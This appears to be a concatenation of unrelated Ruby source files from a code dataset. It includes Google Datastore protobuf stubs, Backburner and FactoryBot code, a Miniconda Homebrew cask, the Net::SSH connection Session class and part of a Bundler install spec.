# @return [::Google::Cloud::Datastore::Admin::V1::Index]
# The index to create. The name and state fields are output only and will be
# ignored. Single property indexes cannot be created or deleted.
class CreateIndexRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The request for
# {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#delete_index google.datastore.admin.v1.DatastoreAdmin.DeleteIndex}.
# @!attribute [rw] project_id
# @return [::String]
# Project ID against which to make the request.
# @!attribute [rw] index_id
# @return [::String]
# The resource ID of the index to delete.
class DeleteIndexRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The request for {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#get_index google.datastore.admin.v1.DatastoreAdmin.GetIndex}.
# @!attribute [rw] project_id
# @return [::String]
# Project ID against which to make the request.
# @!attribute [rw] index_id
# @return [::String]
# The resource ID of the index to get.
class GetIndexRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The request for
# {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#list_indexes google.datastore.admin.v1.DatastoreAdmin.ListIndexes}.
# @!attribute [rw] project_id
# @return [::String]
# Project ID against which to make the request.
# @!attribute [rw] filter
# @return [::String]
# @!attribute [rw] page_size
# @return [::Integer]
# The maximum number of items to return. If zero, then all results will be
# returned.
# @!attribute [rw] page_token
# @return [::String]
# The next_page_token value returned from a previous List request, if any.
class ListIndexesRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The response for
# {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#list_indexes google.datastore.admin.v1.DatastoreAdmin.ListIndexes}.
# @!attribute [rw] indexes
# @return [::Array<::Google::Cloud::Datastore::Admin::V1::Index>]
# The indexes.
# @!attribute [rw] next_page_token
# @return [::String]
# The standard List next-page token.
class ListIndexesResponse
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Metadata for Index operations.
# @!attribute [rw] common
# @return [::Google::Cloud::Datastore::Admin::V1::CommonMetadata]
# Metadata common to all Datastore Admin operations.
# @!attribute [rw] progress_entities
# @return [::Google::Cloud::Datastore::Admin::V1::Progress]
# An estimate of the number of entities processed.
# @!attribute [rw] index_id
# @return [::String]
# The index resource ID that this operation is acting on.
class IndexOperationMetadata
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Metadata for Datastore to Firestore migration operations.
#
# The DatastoreFirestoreMigration operation is not started by the end-user via
# an explicit "creation" method. This is an intentional deviation from the LRO
# design pattern.
#
# This singleton resource can be accessed at:
# "projects/\\{project_id}/operations/datastore-firestore-migration"
# @!attribute [rw] migration_state
# @return [::Google::Cloud::Datastore::Admin::V1::MigrationState]
# The current state of migration from Cloud Datastore to Cloud Firestore in
# Datastore mode.
# @!attribute [rw] migration_step
# @return [::Google::Cloud::Datastore::Admin::V1::MigrationStep]
# The current step of migration from Cloud Datastore to Cloud Firestore in
# Datastore mode.
class DatastoreFirestoreMigrationMetadata
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Operation types.
module OperationType
# Unspecified.
OPERATION_TYPE_UNSPECIFIED = 0
# ExportEntities.
EXPORT_ENTITIES = 1
# ImportEntities.
IMPORT_ENTITIES = 2
# CreateIndex.
CREATE_INDEX = 3
# DeleteIndex.
DELETE_INDEX = 4
end
end
end
end
end
end
| 48.004843 | 162 | 0.598255 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Google
  module Apis
    # Generated version metadata for the google-apis-memcache_v1beta2 client.
    module MemcacheV1beta2
      # Version of the google-apis-memcache_v1beta2 gem
      GEM_VERSION = "0.16.0"

      # Version of the code generator used to generate this client
      GENERATOR_VERSION = "0.4.0"

      # Revision of the discovery document this client was generated from
      REVISION = "20211028"
    end
  end
end
| 32.37931 | 74 | 0.731629 |
module Backburner
  # Mixin that turns a class into a Backburner job queue. Including it primes
  # all queue-related class-level settings, installs the class-side DSL
  # (ClassMethods), and registers the class with the worker's known queues.
  module Queue
    def self.included(base)
      %i[@queue_name @queue_priority @queue_respond_timeout
         @queue_max_job_retries @queue_retry_delay @queue_retry_delay_proc
         @queue_jobs_limit @queue_garbage_limit @queue_retry_limit].each do |ivar|
        base.instance_variable_set(ivar, nil)
      end
      base.extend ClassMethods
      Backburner::Worker.known_queue_classes << base
    end

    module ClassMethods
      # Combined setter/getter for the queue name.
      #
      # With an argument, assigns the queue name (a String or a Proc that is
      # called with the class). Without one, resolves the current name,
      # falling back to the globally configured primary queue.
      #
      # @example
      #   queue "some.task.name"
      #   @klass.queue # => "some.task.name"
      def queue(name=nil)
        return @queue_name = name if name

        resolved = @queue_name.is_a?(Proc) ? @queue_name.call(self) : @queue_name
        resolved || Backburner.configuration.primary_queue
      end

      # The remaining settings are all simple "assign when given a truthy
      # argument, otherwise read back" accessors, so they are generated.
      #
      # queue_priority        - beanstalk priority for jobs on this queue
      # queue_respond_timeout - TTR (time-to-run) for jobs
      # queue_max_job_retries - maximum retry attempts
      # queue_retry_delay     - base delay between retries
      # queue_retry_delay_proc- proc(min_retry_delay, num_retries) -> delay
      # queue_jobs_limit      - parallel active jobs (ThreadsOnFork/Threading)
      # queue_garbage_limit   - jobs before fork garbage-collects (ThreadsOnFork)
      # queue_retry_limit     - retry limit (ThreadsOnFork)
      %i[priority respond_timeout max_job_retries retry_delay
         retry_delay_proc jobs_limit garbage_limit retry_limit].each do |setting|
        ivar = :"@queue_#{setting}"
        define_method(:"queue_#{setting}") do |value = nil|
          if value
            instance_variable_set(ivar, value)
          else
            instance_variable_get(ivar)
          end
        end
      end
    end # ClassMethods
  end # Queue
end # Backburner
| 28.253425 | 123 | 0.606303 |
# frozen_string_literal: true
require "factory_bot"

FactoryBot.define do
  # Factory for Alchemy::Site records (class referenced by name so this file
  # can be loaded before the model).
  factory :alchemy_site, class: "Alchemy::Site" do
    name { "A Site" }
    host { "domain.com" }

    # Mirrors the configured default site: name/host come from
    # Alchemy::Config's :default_site entry.
    trait :default do
      public { true }
      name { Alchemy::Config.get(:default_site)["name"] }
      host { Alchemy::Config.get(:default_site)["host"] }
    end

    # A publicly visible site with the factory's default name/host.
    trait :public do
      public { true }
    end
  end
end
| 18.454545 | 57 | 0.618227 |
ff0fdfc6fdc22ddb4cd9d4cef82f7bf14adbd259 | 102 | class TrainsController < ApplicationController
def show
render template: "trains/index"
end
end
| 12.75 | 46 | 0.784314 |
require 'spec_helper_acceptance'

describe 'cis_hardening_network class' do
  context 'default parameters' do
    # Manifest under test. The original called `idempotent_apply(pp)` with no
    # `pp` defined in scope, so `pp` resolved to Kernel#pp (which returns nil
    # when called without arguments) and the apply was a no-op.
    let(:pp) { 'include cis_hardening_network' }

    it 'behaves idempotently' do
      idempotent_apply(pp)
    end
  end
end
| 18.8 | 41 | 0.75 |
class CreateTrades < ActiveRecord::Migration[6.0]
  # Creates the trades table: one row per trade a user makes in a coin.
  def change
    create_table :trades do |t|
      t.text :coin_name
      # Presumably the coin's price at the time of the trade — confirm with
      # the model; no precision/scale is set on the decimal column.
      t.decimal :current_price
      t.integer :quantity
      t.integer :user_id # plain FK column (no index or constraint added here)
      t.timestamps null: false
    end
  end
end
| 19.307692 | 49 | 0.657371 |
edcf9b00d1f3aced60264a3ac9e28451341e7bba | 949 | #
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html.
# Run `pod lib lint device_kit.podspec' to validate before publishing.
#
Pod::Spec.new do |s|
s.name = 'device_kit'
s.version = '0.1.1'
s.summary = 'Flutter plugin for Device.'
s.description = <<-DESC
Flutter plugin for Device.
DESC
s.homepage = 'http://example.com'
s.license = { :file => '../LICENSE' }
s.author = { 'Your Company' => '[email protected]' }
s.source = { :path => '.' }
s.source_files = 'Classes/**/*'
s.public_header_files = 'Classes/**/*.h'
s.dependency 'Flutter'
s.platform = :ios, '8.0'
s.subspec 'vendor' do |sp|
sp.frameworks = 'CoreTelephony'
end
# Flutter.framework does not contain a i386 slice.
s.pod_target_xcconfig = { 'DEFINES_MODULE' => 'YES', 'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => 'i386' }
end
| 33.892857 | 105 | 0.591149 |
require 'net/ssh/loggable'
require 'net/ssh/ruby_compat'
require 'net/ssh/connection/channel'
require 'net/ssh/connection/constants'
require 'net/ssh/service/forward'
module Net; module SSH; module Connection
# A session class representing the connection service running on top of
# the SSH transport layer. It manages the creation of channels (see
# #open_channel), and the dispatching of messages to the various channels.
# It also encapsulates the SSH event loop (via #loop and #process),
# and serves as a central point-of-reference for all SSH-related services (e.g.
# port forwarding, SFTP, SCP, etc.).
#
# You will rarely (if ever) need to instantiate this class directly; rather,
# you'll almost always use Net::SSH.start to initialize a new network
# connection, authenticate a user, and return a new connection session,
# all in one call.
#
# Net::SSH.start("localhost", "user") do |ssh|
# # 'ssh' is an instance of Net::SSH::Connection::Session
# ssh.exec! "/etc/init.d/some_process start"
# end
class Session
include Constants, Loggable
# The underlying transport layer abstraction (see Net::SSH::Transport::Session).
attr_reader :transport
# The map of options that were used to initialize this instance.
attr_reader :options
# The collection of custom properties for this instance. (See #[] and #[]=).
attr_reader :properties
# The map of channels, each key being the local-id for the channel.
attr_reader :channels #:nodoc:
# The map of listeners that the event loop knows about. See #listen_to.
attr_reader :listeners #:nodoc:
# The map of specialized handlers for opening specific channel types. See
# #on_open_channel.
attr_reader :channel_open_handlers #:nodoc:
# The list of callbacks for pending requests. See #send_global_request.
attr_reader :pending_requests #:nodoc:
class NilChannel
  # Stand-in used as the default value of the Session's channel map (see
  # Session#initialize): requests aimed at unknown/closed channel ids are
  # swallowed with a warning instead of raising NoMethodError.
  def initialize(session)
    @session = session
  end

  # Catch-all: log and ignore any channel operation.
  def method_missing(sym, *args)
    @session.lwarn { "ignoring request #{sym.inspect} for non-existent (closed?) channel; probably ssh server bug" }
  end
end
# Create a new connection service instance atop the given transport
# layer. Initializes the listeners to be only the underlying socket object.
# Create a new connection service instance atop the given transport layer.
# Initializes the listeners to be only the underlying socket object, primes
# the channel bookkeeping, and captures packet/window size limits from the
# options.
def initialize(transport, options={})
  self.logger = transport.logger
  @transport = transport
  @options = options

  @channel_id_counter = -1
  # Unknown channel ids resolve to a NilChannel, which logs and ignores
  # requests (guards against servers referencing already-closed channels).
  @channels = Hash.new(NilChannel.new(self))
  @listeners = { transport.socket => nil }
  @pending_requests = []
  @channel_open_handlers = {}
  @on_global_request = {}
  @properties = (options[:properties] || {}).dup

  # Hash#fetch expresses "use the default only when the key is absent"
  # (explicitly-passed nil/false are honored) more directly than the
  # original has_key? ternaries.
  @max_pkt_size = options.fetch(:max_pkt_size, 0x8000)
  @max_win_size = options.fetch(:max_win_size, 0x20000)
end
# Retrieves a custom property from this instance. This can be used to
# store additional state in applications that must manage multiple
# SSH connections.
def [](key)
  @properties[key] # custom per-session property lookup (see #properties)
end
# Sets a custom property for this instance.
def []=(key, value)
  @properties[key] = value # store a custom per-session property
end
# Returns the name of the host that was given to the transport layer to
# connect to.
def host
  transport.host # delegate: the host the transport layer connected to
end
# Returns true if the underlying transport has been closed. Note that
# this can be a little misleading, since if the remote server has
# closed the connection, the local end will still think it is open
# until the next operation on the socket. Nevertheless, this method can
# be useful if you just want to know if _you_ have closed the connection.
def closed?
  # Reflects only the local close state; a remote close may not be seen
  # until the next socket operation (see the comment above this method).
  transport.closed?
end
# Closes the session gracefully, blocking until all channels have
# successfully closed, and then closes the underlying transport layer
# connection.
# Gracefully shut the session down: ask every open channel to close, pump
# the event loop until they have all gone away, then close the transport.
def close
  info { "closing remaining channels (#{channels.length} open)" }
  channels.each_value(&:close)
  loop(0.1) { channels.any? }
  transport.close
end
# Performs a "hard" shutdown of the connection. In general, this should
# never be done, but it might be necessary (in a rescue clause, for instance,
# when the connection needs to close but you don't know the status of the
# underlying protocol's state).
def shutdown!
  # Hard, non-graceful teardown — bypasses channel close handshakes.
  transport.shutdown!
end
# preserve a reference to Kernel#loop
alias :loop_forever :loop
# Returns +true+ if there are any channels currently active on this
# session. By default, this will not include "invisible" channels
# (such as those created by forwarding ports and such), but if you pass
# a +true+ value for +include_invisible+, then those will be counted.
#
# This can be useful for determining whether the event loop should continue
# to be run.
#
# ssh.loop { ssh.busy? }
# True while any channel is active. By default "invisible" channels
# (e.g. those created internally for port forwarding) are not counted;
# pass +true+ to count them as well.
def busy?(include_invisible=false)
  return channels.any? if include_invisible

  channels.any? { |_id, chan| !chan[:invisible] }
end
# The main event loop. Calls #process until #process returns false. If a
# block is given, it is passed to #process, otherwise a default proc is
# used that just returns true if there are any channels active (see #busy?).
# The # +wait+ parameter is also passed through to #process (where it is
# interpreted as the maximum number of seconds to wait for IO.select to return).
#
# # loop for as long as there are any channels active
# ssh.loop
#
# # loop for as long as there are any channels active, but make sure
# # the event loop runs at least once per 0.1 second
# ssh.loop(0.1)
#
# # loop until ctrl-C is pressed
# int_pressed = false
# trap("INT") { int_pressed = true }
# ssh.loop(0.1) { not int_pressed }
def loop(wait=nil, &block)
  # Default termination condition: keep looping while any visible
  # channel is active (see #busy?).
  running = block || Proc.new { busy? }
  # loop_forever is the Kernel#loop alias captured above, since this
  # method shadows Kernel#loop.
  loop_forever { break unless process(wait, &running) }
end
# The core of the event loop. It processes a single iteration of the event
# loop. If a block is given, it should return false when the processing
# should abort, which causes #process to return false. Otherwise,
# #process returns true. The session itself is yielded to the block as its
# only argument.
#
# If +wait+ is nil (the default), this method will block until any of the
# monitored IO objects are ready to be read from or written to. If you want
# it to not block, you can pass 0, or you can pass any other numeric value
# to indicate that it should block for no more than that many seconds.
# Passing 0 is a good way to poll the connection, but if you do it too
# frequently it can make your CPU quite busy!
#
# This will also cause all active channels to be processed once each (see
# Net::SSH::Connection::Channel#on_process).
#
# # process multiple Net::SSH connections in parallel
# connections = [
# Net::SSH.start("host1", ...),
# Net::SSH.start("host2", ...)
# ]
#
# connections.each do |ssh|
# ssh.exec "grep something /in/some/files"
# end
#
# condition = Proc.new { |s| s.busy? }
#
# loop do
# connections.delete_if { |ssh| !ssh.process(0.1, &condition) }
# break if connections.empty?
# end
def process(wait=nil, &block)
  # Bail out early if the caller's condition says to stop.
  return false unless preprocess(&block)
  r = listeners.keys
  # Only monitor writability for IOs that actually have queued output.
  w = r.select { |w2| w2.respond_to?(:pending_write?) && w2.pending_write? }
  readers, writers, = Net::SSH::Compat.io_select(r, w, nil, wait)
  postprocess(readers, writers)
end
# This is called internally as part of #process. It dispatches any
# available incoming packets, and then runs Net::SSH::Connection::Channel#process
# for any active channels. If a block is given, it is invoked at the
# start of the method and again at the end, and if the block ever returns
# false, this method returns false. Otherwise, it returns true.
def preprocess
  # The caller's block is consulted both before and after dispatch so a
  # condition that flips during processing stops the loop promptly.
  return false if block_given? && !yield(self)
  dispatch_incoming_packets
  # Give each still-open channel a chance to run its on_process callbacks.
  channels.each { |id, channel| channel.process unless channel.closing? }
  return false if block_given? && !yield(self)
  return true
end
# This is called internally as part of #process. It loops over the given
# arrays of reader IO's and writer IO's, processing them as needed, and
# then calls Net::SSH::Transport::Session#rekey_as_needed to allow the
# transport layer to rekey. Then returns true.
# Second half of #process: service each ready reader (invoking its
# registered callback, or filling its buffer and reaping it on EOF), flush
# each ready writer, let the transport rekey if due, and return true.
def postprocess(readers, writers)
  Array(readers).each do |reader|
    callback = listeners[reader]
    if callback
      callback.call(reader)
    elsif reader.fill.zero?
      # No callback registered and zero bytes read: the IO hit EOF.
      reader.close
      stop_listening_to(reader)
    end
  end

  Array(writers).each(&:send_pending)

  transport.rekey_as_needed
  true
end
# Send a global request of the given type. The +extra+ parameters must
# be even in number, and conform to the same format as described for
# Net::SSH::Buffer.from. If a callback is not specified, the request will
# not require a response from the server, otherwise the server is required
# to respond and indicate whether the request was successful or not. This
# success or failure is indicated by the callback being invoked, with the
# first parameter being true or false (success, or failure), and the second
# being the packet itself.
#
# Generally, Net::SSH will manage global requests that need to be sent
# (e.g. port forward requests and such are handled in the Net::SSH::Service::Forward
# class, for instance). However, there may be times when you need to
# send a global request that isn't explicitly handled by Net::SSH, and so
# this method is available to you.
#
# ssh.send_global_request("[email protected]")
def send_global_request(type, *extra, &callback)
  info { "sending global request #{type}" }
  # want_reply is true only when a callback was supplied.
  msg = Buffer.from(:byte, GLOBAL_REQUEST, :string, type.to_s, :bool, !callback.nil?, *extra)
  send_message(msg)
  # Queued callbacks are presumably matched to server replies in arrival
  # order — confirm in the reply-dispatch code.
  pending_requests << callback if callback
  self
end
# Requests that a new channel be opened. By default, the channel will be
# of type "session", but if you know what you're doing you can select any
# of the channel types supported by the SSH protocol. The +extra+ parameters
# must be even in number and conform to the same format as described for
# Net::SSH::Buffer.from. If a callback is given, it will be invoked when
# the server confirms that the channel opened successfully. The sole parameter
# for the callback is the channel object itself.
#
# In general, you'll use #open_channel without any arguments; the only
# time you'd want to set the channel type or pass additional initialization
# data is if you were implementing an SSH extension.
#
# channel = ssh.open_channel do |ch|
# ch.exec "grep something /some/files" do |ch, success|
# ...
# end
# end
#
# channel.wait
def open_channel(type="session", *extra, &on_confirm)
  # Allocate the next local channel id and build the channel object; the
  # on_confirm callback fires when the server acknowledges the open.
  local_id = get_next_channel_id
  channel = Channel.new(self, type, local_id, @max_pkt_size, @max_win_size, &on_confirm)
  msg = Buffer.from(:byte, CHANNEL_OPEN, :string, type, :long, local_id,
    :long, channel.local_maximum_window_size,
    :long, channel.local_maximum_packet_size, *extra)
  send_message(msg)
  # Register the channel so incoming packets can be dispatched to it.
  channels[local_id] = channel
end
# A convenience method for executing a command and interacting with it. If
# no block is given, all output is printed via $stdout and $stderr. Otherwise,
# the block is called for each data and extended data packet, with three
# arguments: the channel object, a symbol indicating the data type
# (:stdout or :stderr), and the data (as a string).
#
# Note that this method returns immediately, and requires an event loop
# (see Session#loop) in order for the command to actually execute.
#
# This is effectively identical to calling #open_channel, and then
# Net::SSH::Connection::Channel#exec, and then setting up the channel
# callbacks. However, for most uses, this will be sufficient.
#
# ssh.exec "grep something /some/files" do |ch, stream, data|
# if stream == :stderr
# puts "ERROR: #{data}"
# else
# puts data
# end
# end
# Convenience wrapper: open a channel, execute +command+ on it, and wire up
# output handling. With a block, the block receives (channel, :stdout|:stderr,
# data) for every packet; without one, output is printed to $stdout/$stderr.
# Returns immediately; an event loop (see #loop) must run for the command
# to actually execute.
def exec(command, &block)
  open_channel do |channel|
    channel.exec(command) do |ch, success|
      raise "could not execute command: #{command.inspect}" unless success

      channel.on_data do |ch2, data|
        block ? block.call(ch2, :stdout, data) : $stdout.print(data)
      end

      channel.on_extended_data do |ch2, type, data|
        block ? block.call(ch2, :stderr, data) : $stderr.print(data)
      end
    end
  end
end
# Same as #exec, except this will block until the command finishes. Also,
# if a block is not given, this will return all output (stdout and stderr)
# as a single string.
#
# matches = ssh.exec!("grep something /some/files")
def exec!(command, &block)
block ||= Proc.new do |ch, type, data|
ch[:result] ||= ""
ch[:result] << data
end
channel = exec(command, &block)
channel.wait
return channel[:result]
end
# Enqueues a message to be sent to the server as soon as the socket is
# available for writing. Most programs will never need to call this, but
# if you are implementing an extension to the SSH protocol, or if you
# need to send a packet that Net::SSH does not directly support, you can
# use this to send it.
#
# ssh.send_message(Buffer.from(:byte, REQUEST_SUCCESS).to_s)
def send_message(message)
transport.enqueue_message(message)
end
# Adds an IO object for the event loop to listen to. If a callback
# is given, it will be invoked when the io is ready to be read, otherwise,
# the io will merely have its #fill method invoked.
#
# Any +io+ value passed to this method _must_ have mixed into it the
# Net::SSH::BufferedIo functionality, typically by calling #extend on the
# object.
#
# The following example executes a process on the remote server, opens
# a socket to somewhere, and then pipes data from that socket to the
# remote process' stdin stream:
#
# channel = ssh.open_channel do |ch|
# ch.exec "/some/process/that/wants/input" do |ch, success|
# abort "can't execute!" unless success
#
# io = TCPSocket.new(somewhere, port)
# io.extend(Net::SSH::BufferedIo)
# ssh.listen_to(io)
#
# ch.on_process do
# if io.available > 0
# ch.send_data(io.read_available)
# end
# end
#
# ch.on_close do
# ssh.stop_listening_to(io)
# io.close
# end
# end
# end
#
# channel.wait
def listen_to(io, &callback)
listeners[io] = callback
end
# Removes the given io object from the listeners collection, so that the
# event loop will no longer monitor it.
def stop_listening_to(io)
listeners.delete(io)
end
# Returns a reference to the Net::SSH::Service::Forward service, which can
# be used for forwarding ports over SSH.
def forward
@forward ||= Service::Forward.new(self)
end
# Registers a handler to be invoked when the server wants to open a
# channel on the client. The callback receives the connection object,
# the new channel object, and the packet itself as arguments, and should
# raise ChannelOpenFailed if it is unable to open the channel for some
# reason. Otherwise, the channel will be opened and a confirmation message
# sent to the server.
#
# This is used by the Net::SSH::Service::Forward service to open a channel
# when a remote forwarded port receives a connection. However, you are
# welcome to register handlers for other channel types, as needed.
def on_open_channel(type, &block)
channel_open_handlers[type] = block
end
# Registers a handler to be invoked when the server sends a global request
# of the given type. The callback receives the request data as the first
# parameter, and true/false as the second (indicating whether a response
# is required). If the callback sends the response, it should return
# :sent. Otherwise, if it returns true, REQUEST_SUCCESS will be sent, and
# if it returns false, REQUEST_FAILURE will be sent.
def on_global_request(type, &block)
old, @on_global_request[type] = @on_global_request[type], block
old
end
private
# Read all pending packets from the connection and dispatch them as
# appropriate. Returns as soon as there are no more pending packets.
def dispatch_incoming_packets
while packet = transport.poll_message
unless MAP.key?(packet.type)
raise Net::SSH::Exception, "unexpected response #{packet.type} (#{packet.inspect})"
end
send(MAP[packet.type], packet)
end
end
# Returns the next available channel id to be assigned, and increments
# the counter.
def get_next_channel_id
@channel_id_counter += 1
end
# Invoked when a global request is received. The registered global
# request callback will be invoked, if one exists, and the necessary
# reply returned.
def global_request(packet)
info { "global request received: #{packet[:request_type]} #{packet[:want_reply]}" }
callback = @on_global_request[packet[:request_type]]
result = callback ? callback.call(packet[:request_data], packet[:want_reply]) : false
if result != :sent && result != true && result != false
raise "expected global request handler for `#{packet[:request_type]}' to return true, false, or :sent, but got #{result.inspect}"
end
if packet[:want_reply] && result != :sent
msg = Buffer.from(:byte, result ? REQUEST_SUCCESS : REQUEST_FAILURE)
send_message(msg)
end
end
# Invokes the next pending request callback with +true+.
def request_success(packet)
info { "global request success" }
callback = pending_requests.shift
callback.call(true, packet) if callback
end
# Invokes the next pending request callback with +false+.
def request_failure(packet)
info { "global request failure" }
callback = pending_requests.shift
callback.call(false, packet) if callback
end
# Called when the server wants to open a channel. If no registered
# channel handler exists for the given channel type, CHANNEL_OPEN_FAILURE
# is returned, otherwise the callback is invoked and everything proceeds
# accordingly.
def channel_open(packet)
info { "channel open #{packet[:channel_type]}" }
local_id = get_next_channel_id
channel = Channel.new(self, packet[:channel_type], local_id, @max_pkt_size, @max_win_size)
channel.do_open_confirmation(packet[:remote_id], packet[:window_size], packet[:packet_size])
callback = channel_open_handlers[packet[:channel_type]]
if callback
begin
callback[self, channel, packet]
rescue ChannelOpenFailed => err
failure = [err.code, err.reason]
else
channels[local_id] = channel
msg = Buffer.from(:byte, CHANNEL_OPEN_CONFIRMATION, :long, channel.remote_id, :long, channel.local_id, :long, channel.local_maximum_window_size, :long, channel.local_maximum_packet_size)
end
else
failure = [3, "unknown channel type #{channel.type}"]
end
if failure
error { failure.inspect }
msg = Buffer.from(:byte, CHANNEL_OPEN_FAILURE, :long, channel.remote_id, :long, failure[0], :string, failure[1], :string, "")
end
send_message(msg)
end
def channel_open_confirmation(packet)
info { "channel_open_confirmation: #{packet[:local_id]} #{packet[:remote_id]} #{packet[:window_size]} #{packet[:packet_size]}" }
channel = channels[packet[:local_id]]
channel.do_open_confirmation(packet[:remote_id], packet[:window_size], packet[:packet_size])
end
def channel_open_failure(packet)
error { "channel_open_failed: #{packet[:local_id]} #{packet[:reason_code]} #{packet[:description]}" }
channel = channels.delete(packet[:local_id])
channel.do_open_failed(packet[:reason_code], packet[:description])
end
def channel_window_adjust(packet)
info { "channel_window_adjust: #{packet[:local_id]} +#{packet[:extra_bytes]}" }
channels[packet[:local_id]].do_window_adjust(packet[:extra_bytes])
end
def channel_request(packet)
info { "channel_request: #{packet[:local_id]} #{packet[:request]} #{packet[:want_reply]}" }
channels[packet[:local_id]].do_request(packet[:request], packet[:want_reply], packet[:request_data])
end
def channel_data(packet)
info { "channel_data: #{packet[:local_id]} #{packet[:data].length}b" }
channels[packet[:local_id]].do_data(packet[:data])
end
def channel_extended_data(packet)
info { "channel_extended_data: #{packet[:local_id]} #{packet[:data_type]} #{packet[:data].length}b" }
channels[packet[:local_id]].do_extended_data(packet[:data_type], packet[:data])
end
def channel_eof(packet)
info { "channel_eof: #{packet[:local_id]}" }
channels[packet[:local_id]].do_eof
end
def channel_close(packet)
info { "channel_close: #{packet[:local_id]}" }
channel = channels[packet[:local_id]]
channel.close
channels.delete(packet[:local_id])
channel.do_close
end
def channel_success(packet)
info { "channel_success: #{packet[:local_id]}" }
channels[packet[:local_id]].do_success
end
def channel_failure(packet)
info { "channel_failure: #{packet[:local_id]}" }
channels[packet[:local_id]].do_failure
end
MAP = Constants.constants.inject({}) do |memo, name|
value = const_get(name)
next unless Integer === value
memo[value] = name.downcase.to_sym
memo
end
end
end; end; end
| 38.262458 | 198 | 0.654815 |
ac64d70c7d82998044b6eaabeb097e82567f42d0 | 1,560 | cask "miniconda" do
arch = Hardware::CPU.intel? ? "x86_64" : "arm64"
version "py39_4.12.0"
if Hardware::CPU.intel?
sha256 "007bae6f18dc7b6f2ca6209b5a0c9bd2f283154152f82becf787aac709a51633"
else
sha256 "4bd112168cc33f8a4a60d3ef7e72b52a85972d588cd065be803eb21d73b625ef"
end
url "https://repo.anaconda.com/miniconda/Miniconda3-#{version}-MacOSX-#{arch}.sh",
verified: "repo.anaconda.com/miniconda/"
name "Continuum Analytics Miniconda"
desc "Minimal installer for conda"
homepage "https://conda.io/miniconda.html"
# This regex restricts matching to a specific Python version. This will need
# to be updated when the prefix changes in the latest version at the top of:
# https://repo.anaconda.com/miniconda/Miniconda3-latest-MacOSX-#{arch}.sh
livecheck do
url "https://repo.anaconda.com/miniconda/"
if Hardware::CPU.intel?
regex(/>\s*Miniconda3-(py39[._-]\d+(?:\.\d+)+)-MacOSX-#{arch}\.sh\s*</i)
else
regex(/>\s*Miniconda3-(py38[._-]\d+(?:\.\d+)+)-MacOSX-#{arch}\.sh\s*</i)
end
end
auto_updates true
conflicts_with cask: "miniforge"
container type: :naked
installer script: {
executable: "Miniconda3-#{version}-MacOSX-#{arch}.sh",
args: ["-b", "-p", "#{caskroom_path}/base"],
}
binary "#{caskroom_path}/base/condabin/conda"
uninstall delete: "#{caskroom_path}/base"
zap trash: [
"~/.condarc",
"~/.conda",
"~/.continuum",
]
caveats <<~EOS
Please run the following to setup your shell:
conda init "$(basename "${SHELL}")"
EOS
end
| 30 | 84 | 0.669872 |
d5207420c93593205ddf5c44143d505d13834635 | 4,339 | require "spec_helper"
# Integration specs: resolving and installing gems across platforms
# (ruby / java / x86-mswin32) and across Ruby version switches.
describe "bundle install across platforms" do
  it "maintains the same lockfile if all gems are compatible across platforms" do
    lockfile <<-G
      GEM
        remote: file:#{gem_repo1}/
        specs:
          rack (0.9.1)

      PLATFORMS
        #{not_local}

      DEPENDENCIES
        rack
    G

    install_gemfile <<-G
      source "file://#{gem_repo1}"

      gem "rack"
    G

    should_be_installed "rack 0.9.1"
  end

  # The lockfile only lists the "ruby" platform, but installing on java
  # must still pick the java-specific variant of the gem.
  it "pulls in the correct platform specific gem" do
    lockfile <<-G
      GEM
        remote: file:#{gem_repo1}
        specs:
          platform_specific (1.0)
          platform_specific (1.0-java)
          platform_specific (1.0-x86-mswin32)

      PLATFORMS
        ruby

      DEPENDENCIES
        platform_specific
    G

    simulate_platform "java"
    install_gemfile <<-G
      source "file://#{gem_repo1}"

      gem "platform_specific"
    G

    should_be_installed "platform_specific 1.0 JAVA"
  end

  # nokogiri depends on weakling only on java; switching platforms must
  # add/drop the platform-conditional dependency accordingly.
  it "works with gems that have different dependencies" do
    simulate_platform "java"
    install_gemfile <<-G
      source "file://#{gem_repo1}"

      gem "nokogiri"
    G

    should_be_installed "nokogiri 1.4.2 JAVA", "weakling 0.0.3"

    simulate_new_machine

    simulate_platform "ruby"
    install_gemfile <<-G
      source "file://#{gem_repo1}"

      gem "nokogiri"
    G

    should_be_installed "nokogiri 1.4.2"
    should_not_be_installed "weakling"
  end

  it "works the other way with gems that have different dependencies" do
    simulate_platform "ruby"
    install_gemfile <<-G
      source "file://#{gem_repo1}"

      gem "nokogiri"
    G

    simulate_platform "java"
    bundle "install"

    should_be_installed "nokogiri 1.4.2 JAVA", "weakling 0.0.3"
  end

  it "fetches gems again after changing the version of Ruby" do
    gemfile <<-G
      source "file://#{gem_repo1}"

      gem "rack", "1.0.0"
    G

    bundle "install --path vendor/bundle"

    vendored_gems("gems/rack-1.0.0").should exist
  end

  # NOTE(review): Gem::ConfigMap was removed in modern RubyGems; it is
  # valid for the Ruby/RubyGems versions this suite targets.
  it "works after switching Rubies" do
    gemfile <<-G
      source "file://#{gem_repo1}"

      gem "rack", "1.0.0"
    G

    bundle "install --path vendor/bundle"

    new_version = Gem::ConfigMap[:ruby_version] == "1.8" ? "1.9.1" : "1.8"
